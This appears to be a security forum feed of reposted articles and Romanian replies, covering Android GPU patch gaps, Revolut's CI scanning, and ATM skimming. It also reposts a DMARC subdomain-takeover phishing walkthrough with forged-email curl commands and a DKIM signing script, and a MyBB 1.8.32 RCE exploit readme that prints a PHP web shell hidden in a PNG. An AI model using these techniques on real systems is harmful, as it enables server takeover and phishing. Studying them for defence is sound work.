(2325, 2327, 2331, 2333, 2334) in the Arm Mali GPU that affected the Pixel phones. These issues were promptly fixed as CVE-2022-33917 and CVE-2022-36449 by the Arm security team on July 25th, 2022 (CVE-2022-33917 in r39p0) and on August 18th, 2022 (CVE-2022-36449 in r38p1). The details of these bugs, including proof of concepts, were disclosed on September 18th, 2022. However, at least some of the issues remained unfixed in December 2022, (for example, issue 2327 was only fixed silently in the January 2023 patch, without mentioning the CVE ID) after Project zero published a blog post highlighting the patching problem with these particular issues on November 22nd, 2022. In all of these instances, the bugs were only patched in Android a couple months after a patch was publicly released upstream. In light of this, the response to this current bug is perhaps not too surprising. The year is 2023 A.D., and it’s still easy to pwn Android with N-days entirely. Well, yes, entirely. Notes Observant readers who learn their European history from a certain comic series may recognise the similarities between this and the openings to the Asterix series, which usually starts with: “The year is 50 BC. Gaul is entirely occupied by the Romans. Well, not entirely… One small village of indomitable Gauls still holds out against the invaders. And life is not easy for the Roman legionaries who garrison the fortified camps of Totorum, Aquarium, Laudanum and Compendium…” Sursa: https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/
      • 1
      • Upvote
  15. Krzysztof Pranczk Jan 3 Security Drone: Scaling Continuous Security at Revolut Intro As we’re continuously growing and extending our product offerings, we can face many technological challenges. These challenges are solved by our engineers and this results in many features, changes and updates being developed and successfully delivered to our customers. However, with the development of new features comes many security challenges that are faced by the internal Application Security Team. This lovely bunch is responsible for the security assurance of every new feature developed by our engineers. To provide the highest level of security assurance to our products, we’ve implemented a number of processes placed in different stages of the Software Development Life Cycle (SDLC), including automated scans in our CI/CD pipelines. However, it wouldn’t be possible to efficiently triage every security finding produced by automated scanners. In July 2022, there were nearly 39,000 commits created by over 900 authors! To address this challenge, we developed Security Drone. In this article, we’d like to share with you our approach to provide the highest security assurance in fast CI/CD environments. Challenges faced by Revolut The classic approach to security testing requires the security teams to perform a manual review of any developed features, with the help of automated security scans. Traditionally, this work was executed on a risk and priority basis and that need was stretching the team beyond its capacity. Additionally, the team had to cope with the numerous CI pipelines across the company. This approach wasn’t a viable solution in terms of scaling, quality and coverage. Some of you may have an idea of the security challenges faced in a fast CI/CD environment. If not, let us make a little recap of the challenges we’ve been facing: Software changes are constantly increasing New changes are integrated and deployed every day Engineers tend to prioritise the development of functionalities over security The internal application security team can’t be big enough to have a dedicated security engineer for each project — both internal and external AppSec teams nowadays must work on automating the work they were doing 10 years ago in a manual way With more tools integrated into the pipelines, the timeline of each job increases, which negatively affects the development experience And many more challenges you probably observe in your companies too! First solution — The classic approach to CI/CD pipeline scans Our first solution, and the most simplistic one, was to onboard automated security scanners like Static Application Security Testing (SAST) and Software Composition Analysis (SCA) and review the findings within the AppSec team. It worked, but we started facing another problem: the company was growing, and from an initial handful of projects, now we had to deal with thousands of projects and non-stop builds at any given time. As a result, we had to manage hundreds of CI pipelines used for security purposes. Let’s see some numbers of what we observed in our environment. Every 24h of a working day were about 950 new pull requests (PR) with nearly 1.85 commits per PR. During working hours, automated scans were executed 3–4 times per minute, on average, against various projects. The chart below presents how many security scans were performed on the 14th of July 2022 every 30 minutes. Number of automated security scans per 30minutes With those numbers, we faced another challenge — triaging all of the security findings. These scans produced a high number of false positive vulnerabilities that had to be manually triaged by the security team. Initially, we didn’t think scanning every software change was the way to go, we should only be scanning the changes intended for the Production environment. We did the analysis and concluded that about 81% of the commits had a final destination to the main branch, and we were facing the same challenge. Our scanners would be completing at least three successful security scans on a software change every minute! This amount of scans would still result in a potentially high number of false positives, which had to be reviewed and triaged within a certain period of time. Not only that, but more and more security scanners within CI/CD pipelines would affect their timelines negatively. So we thought: ‘Do we really have to go in this direction? Do we have to manage all of the pipelines for various projects and triage all of the identified security issues within the AppSec Team? Do we have to affect CI/CD timelines negatively?’ At this point, we had a lot of doubts and questions about this approach. In the Application Security team we understood this approach wouldn’t be scalable in a fast-paced environment such as Revolut. We could implement some small improvements to address each of these questions. However, those improvements could just delay bigger problems for later on. At this point, we decided to go in a slightly different direction, having a security-shift-left approach in our minds. Security static analysis tools can easily be shifted left to an earlier phase in the SDLC, since these types of tools don’t require the application to be running. Second solution — Security Drone You may expect as a second solution something extremely smart and well-designed. So did we. But it didn’t take long for us to take an agile approach with lean implementations. We also started security shifting left and communicating security issues to developers as early as possible, before going into testing or production environments. At the beginning of our MVP solution, we decided to scan code changes during the pull request phase. In our opinion, it was a natural step for engineers to propose software changes for their colleagues to approve. At this point, we also decided to communicate all of the identified security findings to developers. The scanner’s results could be taken into account during code review, which is an integral part of the development process in Revolut. It should be noted that our scanner was triggered when a new PR was created or code was updated in an already existing PR. We also decided to place Security Drone in a Kubernetes cluster to scan the code independently from CI/CD pipelines and have a centralised scans management. In many cases, independent scans were able to deliver results to developers faster than CI jobs were finished. Initially, we implemented only a SAST scanner solution to make the process as fast as possible, to quickly deliver results to developers. We aimed to provide results in under 300 seconds. We carefully researched available SAST solutions to choose the most suitable one for our needs. It had to be fast, well-documented and allow us to write custom rules to identify potential security issues specific to our environment. Last but not least, we wanted to achieve the lowest possible false positive rate to avoid producing irrelevant findings, to limit the amount of manual work that we had to cope with during triaging. But not only that, as we had decided to communicate all of the identified security findings to developers at the PR page, we had to make sure not to affect their experience negatively by reviewing a number of irrelevant findings. Later, we started implementing new scanners in Security Drone such as Software Composition Analysis and Infrastructure as Code to bring more value to the automated security testing. Security Drone’s high level architecture is presented below. Architecture of Security Drone Currently, we scan all pull requests created by Revolut engineers. In July, Security Drone performed over 39,000 scans. Median scanning time is below 112 seconds and the average is below 110 seconds. Initially, we used 19 SAST and 63 IaC rules. Only high and critical SCA issues were directly reported to our developers. Our first MVP was released in Q1 2022, extended and adjusted in the last months. Now, Security Drone has been operating in production for the last eight months without issues on both the operational and engineering distribution sides. We use the following tools in Security Drone: Semgrep — Static Application Security Testing Snyk Open Source — Software Composition Analysis Checkov — Infrastructure as a Code What have we achieved with Security Drone? We have adopted a shift-left approach to security to identify and communicate security findings earlier in the SDLC, before going into testing or production environments Security issues can be fixed before going into production, and as a result, they don’t have to be manually triaged by AppSec Team members Only merged security issues are reported to the AppSec Team to triage and loop into the vulnerability lifecycle process We lowered the false positive rate by carefully choosing the SAST solution and continual tuning of rules. We were able to achieve ~3.8% FP rate! Our centrally managed scanner currently scans 100% of the code in Revolut which saves us hundreds of hours of manual reviews. Here are some numbers from last 24 hours: • Nearly 1700 pull requests were scanned • Over 3900 scans associated with above PRs were performed Ability to find new vulnerabilities in other applications based on patterns The scans are fast and don’t disrupt the developer experience. They’re executed in parallel and scanning times are presented below: • Median scanning time for SAST is 11 seconds • Median scanning time for IaC is 22 seconds • Median scanning time for SCA is 101 seconds Increased security awareness and continuous learning amongst engineers. They’re also aware of the direction that AppSec is moving. What is next? Security Drone will always be under development as new technologies are emerging and improvements to the development experience can be made. On our roadmap we have various points, some of which include: Ability to flag findings as a false positive in a developer-friendly way Incremental SAST scans — scan only code changes in PRs Integration of more security scanners and the development of more SAST/IaC rules Keep your eyes peeled for our next blogpost around Application Security in Revolut, as we may share more interesting tools and guides on how we solve the challenges we face every day. Credits Credits go to every Revolut AppSec engineer involved in the design and development of Security Drone, especially: Arsalan Ghazi, Krzysztof Pranczk, Pedro Moura, Roger Norton Sursa: https://medium.com/revolut/security-drone-scaling-continuous-security-at-revolut-862bcd55956e
  16. DMARC Identifier Alignment: relax, don't do it, when you want to go to it Jan 25, 2023 in HACKING • MAILSECURITY dmarc spf dkim 9 min read From subdomain takeover to phishing mails TL;DR; if you have a subdomain takeover for a given domain, and default DMARC alignment settings, you can create emails that passes SPF and DMARC for phishing purposes. DKIM, however, cannot be passed for the domain but a trick is possible to make emails look more trustworthy. Introduction I like Mozilla’s definition of a subdomain takeover: A subdomain takeover occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a canonical name (CNAME) in the Domain Name System (DNS), but no host is providing content for it. This can happen because either a virtual host hasn’t been published yet or a virtual host has been removed. An attacker can take over that subdomain by providing their own virtual host and then hosting their own content for it. The usual impact of the above is phishing or cookies' theft from impersonated web pages. Subdomain takeover have consequences in mail security too, and not just on the vulnerable subdomain but also on the organizational one. This article is a practical example of how to craft phishing emails from a subdomain takeover. Prerequisites Vulnerable subdomain One needs a subdomain takeover where the target of a DNS record is fully under his control. E.g. for a vulnerable domain of altf8.fr (I own it), a DNS CNAME record as follow is needed: takeover IN CNAME sub.dangling.com. $ dig +short takeover.altf8.fr sub.dangling.com. where dangling.com is not registered (anymore). One can then claim the dangling.com domain and control its DNS zone, hence making sub.dangling.com point to a controlled server. The above is important as a subdomain takeover pointing to third-parties websites such as Github etc. will not allow an attacker control over a DNS zone or a server which is crucial for the technique describe here to work. “Relaxed” DMARC configuration The DMARC configuration of the target domain needs to allow for “relaxed” mode of SPF Authenticated Identifiers and/or DKIM Authenticated Identifiers. This, though, is the default behaviour if the aspf or adkim settings have not been set. Hence, the following DMARC policy is vulnerable: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject" So would be this one: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject; aspf=r; adkim=r" But that one is not: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject; aspf=s; adkim=s" For the following demonstration, the first policy above was in use. Preparation Let’s set some DNS records on the dangling.com domain that we registered and control. The subdomain takeover: sub IN CNAME server.dangling.com server.dangling.com is identified by: server IN A 1.2.3.4 MX record for the controlled server: target IN MX 10 server.dangling.com So now, takeover.altf8.fr points to the controlled server which is allowed to send mails for sub.dangling.com: $ dig +short takeover.altf8.fr sub.dangling.com. 1.2.3.4 $ dig +short mx takeover.altf8.fr sub.dangling.com. 10 server.dangling.com. Passing SPF The SPF Authenticated Identifiers definition states : In relaxed mode, the SPF-authenticated domain and RFC5322.From domain must have the same Organizational Domain. In strict mode, only an exact DNS domain match is considered to produce Identifier Alignment. The “SPF-authenticated domain” is taken from the SMTP MAIL FROM command. The From domain is taken from the MIME header with the same name. When a mail is received, the MAIL FROM domain value is extracted and the corresponding SPF record is requested then used. This is the behaviour of most mail agents. If relaxed mode is enabled, one can send a subdomain in MAIL FROM and a domain in From with the same organizational domain and SPF will still pass: For example, if a message passes an SPF check with an RFC5321.MailFrom domain of “cbg.bounces.altf8.fr”, and the address portion of the RFC5322.From field contains “payments@altf8.fr”, the Authenticated RFC5321.MailFrom domain identifier and the RFC5322.From domain are considered to be “in alignment” in relaxed mode, but not in strict mode. In our example, we control the SPF record for sub.dangling.com. We set it to: sub IN TXT "v=spf1 mx -all" Which means “all IPs associated with MX records in the sub.dangling.com domain will be authorized to send mails”. Because of the subdomain takeover and how DNS resolution work, we now have a SPF record for takeover.altf8.fr: $ dig +short txt takeover.altf8.fr | grep spf "v=spf1 mx -all" And because we set server.dangling.com as a valid MX, we can now send emails from it. We can do that on the command line of server.dangling.com (altf8.fr uses Microsoft 365, hence why the outlook.com SMTP server below): $ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt [...] * TCP_NODELAY set * Expire in 149967 ms for 3 (transfer 0x55aad3f5a0f0) * Expire in 200 ms for 4 (transfer 0x55aad3f5a0f0) * Connected to [altf8-fr.mail.protection.outlook.com](http://altf8-fr.mail.protection.outlook.com) (104.47.24.36) port 25 (#0) < 220 [PR2FRA01FT014.mail.protection.outlook.com](http://PR2FRA01FT014.mail.protection.outlook.com) Microsoft ESMTP MAIL Service ready at Mon, 23 Jan 2023 15:55:16 +0000 > EHLO mail.txt < [250-PR2FRA01FT014.mail.protection.outlook.com](http://250-PR2FRA01FT014.mail.protection.outlook.com) Hello [1.2.3.4] < 250-SIZE 157286400 < 250-PIPELINING < 250-DSN < 250-ENHANCEDSTATUSCODES < 250-STARTTLS < 250-8BITMIME < 250-BINARYMIME < 250-CHUNKING < 250 SMTPUTF8 > MAIL FROM:<ceo@takeover.altf8.fr> SIZE=140 < 250 2.1.0 Sender OK > RCPT TO:<jbencteux@altf8.fr> < 250 2.1.5 Recipient OK > DATA < 354 Start mail input; end with <CRLF>.<CRLF> } [140 bytes data] * We are completely uploaded and fine 100 140 0 0 100 140 0 185 --:--:-- --:--:-- --:--:-- 185< 250 2.6.0 <b427960e-4306-42a2-9121-fefaaa105def@PR2FRA01FT014.eop-fra01.prod.protection.outlook.com> [InternalId=68521908309720, Hostname=MRZP264MB2425.FRAP264.PROD.OUTLOOK.COM] 8276 bytes in 0.036, 220.364 KB/sec Queued mail for delivery 100 140 0 0 100 140 0 185 --:--:-- --:--:-- --:--:-- 185 * Connection #0 to host [altf8-fr.mail.protection.outlook.com](http://altf8-fr.mail.protection.outlook.com) left intact This is the content of mail.txt: From: ceo@altf8.fr To: jbencteux@altf8.fr Subject: You are fired Hi Jeff, Sorry to tell you this way, but you're out. Best regards, CEO Note the difference of sender in --mail-from and in the From of mail.txt which what the RFC states as allowed when in relaxed SPF alignment. The email is received in the Outlook inbox of jbencteux@altf8.fr, passing the spam filters: Its MIME headers states SPF passes: Received-SPF: Pass (protection.outlook.com: domain of takeover.altf8.fr designates 1.2.3.4 as permitted sender) Note that DMARC passes as well: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 This is because if no DKIM is present (dkim=none) but SPF passes, then DMARC passes. This is a by-design property of DMARC. Ok cool, but the mail is not cryptographically signed and other mail agents might put it in the spam folder for a lack of signature, let’s see if we can get DKIM working. (Kind of) Passing DKIM In a similar fashion than SPF Auth identifiers exists, there are DKIM Authenticated Identifiers: In relaxed mode, the Organizational Domains of both the [[DKIM](https://www.rfc-editor.org/rfc/rfc7489#ref-DKIM ““DomainKeys Identified Mail (DKIM) Signatures”")]- authenticated signing domain (taken from the value of the “d=” tag in the signature) and that of the RFC5322.From domain must be equal if the identifiers are to be considered aligned. In strict mode, only an exact match between both of the Fully Qualified Domain Names (FQDNs) is considered to produce Identifier Alignment. Which means that if DMARC contains adkim=r (or no adkim, as r value is the default one) there could be a d=takeover.altf8.fr in the DKIM signature and a From sender ending in @altf8.fr and DKIM would still pass. Let’s try that. Generate a private key for DKIM signing on server.dangling.com: $ openssl genrsa -out dkim_priv.pem 2048 Get the corresponding public key in base64: $ openssl rsa -in dkim_priv.pem -pubout -outform der 2>/dev/null | openssl base64 -A Ayw[...]zkwA Construct and publish a DKIM record with the obtained public key on our dangling.com DNS zone (s1 is taken as an arbitrary selector): s1._domainkey IN TXT "v=DKIM1; k=rsa; p=Ayw[...]zkwA" $ dig +short txt s1._domainkey.sub.dangling.com "v=DKIM1; k=rsa; p=Ayw[...]zkwA" Sign a mail with the private key using the following python script using dkimpy: import dkim mail = open("mail.txt", "rb").read() selector = b"s1" domain = b"takeover.altf8.fr" privkey = open("dkim_priv.pem", "rb").read() signature = dkim.sign(mail, selector, domain, privkey) print(signature.decode("utf-8")) It gives the following signature that we add to mail.txt: $ ./dkim_sign.py DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=takeover.altf8.fr; i=@takeover.altf8.fr; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from; bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=; b=eV4zAv9pVlDFmFN3DIYBX+hSRq/t4wyXCHbuyEB7GmWha3O8n1rxSyzyn1j15OREU uy6erbTUck2[...]3YxVk/ejgidpedmYoSnl8VChsmXZFsmMeMuuujALo4H1iIG 8EhOesBGxeylmHZI5hGapmzReVyjTyyvoQQP9ymRRAT0uyV3Dej+cxDZ7AVfC7fdzW YFlcH69vbTryw== We then send the signed mail: curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt And the result of the email authentication is as such: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=fail (no key for signature) header.d=takeover.altf8.fr;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 It fails because the mail agent tries to get a DKIM public key DNS record for s1._domainkey.takeover.altf8.fr and that resolves to… nothing. It does not automatically point to s1._domainkey.sub.dangling.com so the DNS response is empty, hence the “no key for signature”. Which mean (AFAIK) there is no valid altf8.fr domain DKIM signature that can be generated from a subdomain takeover. One would need control over *.altf8.fr to make it possible. However, as a hackish way of improving the mail looks, it is still possible to sign it for another domain to try passing more antispam defences. Even if that domain is not our targeted altf8.fr domain (marketing platforms do sign mails for other domains all the time). We can take the subdomain sub.dangling.com as an example. If we reuse our script to sign the mail with sub.dangling.com: DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=sub.dangling.com; i=@sub.dangling.com; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from; bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=; b=gdRYJ8lajpHd4DZfbqOLNtvaqH+tSsbyTM2o3Px3EuTEcAFO6wTe+eLKzQWAiZ6CiNg0l udHoSAd9XJfkjBuP[...]V4Hlg02qSoNmNZOiA/Oj3g53eTf+uoNQdAHT/qjEVBeAN0S hzrmGnN8B8cynWNSIVOw9Pwmqj2nmPTzEYDhJOE7aIiIrlJz59/rhQFUBYrA== curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt We then get a passing DKIM: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=pass (signature was verified) header.d=sub.dangling.com;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 While this will not fool spam filters checking that the signing domain is the sender domain (which they should), it sometimes is enough to have the mail being signed by any domain to pass misconfigured defences. Our mail is now: Passing SPF Passing DMARC Passing DKIM but not for the sender’s domain This can trick a lot of mail clients into believing this email is legit, including Outlook, the tested one for this example. Conclusion While prerequisites for this type of attack is high, it is not unlikely that attackers will use subdomain takeovers in order to be able to forge convincing phishing emails. This could also be a good tactic from a red team point of view as it minimize the interaction between the targeted domain and the operator (a few DNS requests are needed) until the final phishing mail is sent. To avoid and mitigate this issue, I suggest to: Regularly checking your DNS for unused records and removing them to avoid subdomain takeovers If DMARC relaxed modes are not needed, setting the following in your DMARC DNS records: aspf=s; adkim=s; References RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1 (rfc-editor.org) RFC 6376: DomainKeys Identified Mail (DKIM) Signatures (rfc-editor.org) RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) (rfc-editor.org) How to create a DKIM record with OpenSSL - Mailhardener knowledge base Quickstart to DKIM Sign Email with Python – Russell Ballestrini Frankie Goes To Hollywood - Relax (Official Video) - YouTube Sursa: https://www.bencteux.fr/posts/dmarc_relax/
  17. MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) detailed analyse to mybb 1.8.32 代码审计 + LFI RCE 复现 (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir. (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english. (3). This chained bugs can lead to Authenticated RCE. (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32. Exp Usage: first choose a png file that size less than 1kb then merge the png file with a php simple backdoor file using the following commands mac@xxx-2 php-backdoor % cat simple-backdoor.php <?php if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo(); } ?> mac@xxx-2 php-backdoor % ls simple-backdoor.php test.png mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png mac@xxx-2 php-backdoor % file test.png test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced finally run the following commands to run the exp script to get RCE output! enjoy the shell... python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd" reference mybb 1.8.32 RCE in admin panel report MyBB MyBB github 记一次mybb代码审计 mybb bugs in exploit database Sursa: https://github.com/FDlucifer/mybb_1832_LFI_RCE
  18. Nytro

    Atm

    Sunt de acord ca sunt multe metode, inclusiv "full frame" sau chiar bancomate false: https://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/ Fac si eu basic ce se poate, oricum am mai multe conturi pe care le folosesc, chiar daca prinde cineva datele de card inclusiv PIN, e limitat damage-ul
  19. Eu pot doar sa recomand IPBoard si sa te sfatuiesc sa te feresti de vBulletin. Licenta IPBoard de pe RST e "standalone", adica eu ma ocup (cu Zatarra) de infrastructura - un server dedicat, si licenta doar a fost activata din Admin CP. Pretul depinde de serviciile auxiliare pe care le iei, aici gasesti detalii: https://invisioncommunity.com/buy/self-hosted/ PS: Nu e tocmai complicat de instalat si configurat, necesita cunostiinele clasice de Linux + PHP/MariaDB/Apache sau similare.
  20. Nu, deoarece PIN-ul nu se afla pe banda magnetica. Dar se pot face plati online. Ajuta 3D secure partial, e util doar daca site-urile de pe care ar putea cumpara online (sau procesatorii de plata) chiar implementeaza si ei 3D secure, ceea ce nu prea se intampla pe la americani (si site-urile lor).
  21. Nytro

    Atm

    Iti poate fura datele de card (depinde de skimmer, poate contine si PIN-ul). Eu mereu trag de chestia de inserat cardul si tastatura + tin portofelul deasupra tastaturii cand bag PIN-ul in caz de camera. Important, cred ca am mai spus pe aici: daca gasiti un skimmer, il puneti la loc si plecati de acolo. Apoi sunati la politie, banca sau ce vreti voi. Sfatul l-am primit de la cineva de la o banca care se ocupa cu protejarea ATM-urile de skimmere. Ideea era simpla: o dracie de skimmer e foarte scumpa iar boschetarii care o au sunt in stare sa va taie, doar sa nu o piarda.
  22. Pe banda magnetica se afla datele cardului, copia lor se face printr-un swipe (trecere a cardului prin acea fasie). La noi in tara nu am folosit niciodata in viata metoda asta, doar pe la americani am folosit.
  23. Eu nu am auzit chestii de rau despre ei.
  24. E relativ normal, vin o gramada de mizerii, destul de multe duplicate, pare OK ca numar.
  25. Oh, nice, credeam ca nu mai merge serviciul.
×
×
  • Create New...